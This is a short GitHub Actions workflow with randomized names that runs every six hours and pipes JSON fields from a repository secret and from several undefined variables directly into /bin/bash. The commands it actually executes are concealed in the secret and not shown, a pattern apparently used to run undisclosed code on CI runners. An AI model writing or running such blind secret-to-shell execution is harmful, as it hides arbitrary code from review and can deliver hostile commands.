name: qiaosangou8129

on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qiaosangou8129
        env:
          exdru6: ${{ secrets.exdru6 }}
        run: |
          echo $exdru6 | jq -r .bt053 | /bin/bash
          echo $qqzts4183 | jq -r .ptohx549 | /bin/bash
          echo $r3983 | jq -r .qhnq3392 | /bin/bash
          echo $scyrl86047 | jq -r .wgul81452 | /bin/bash

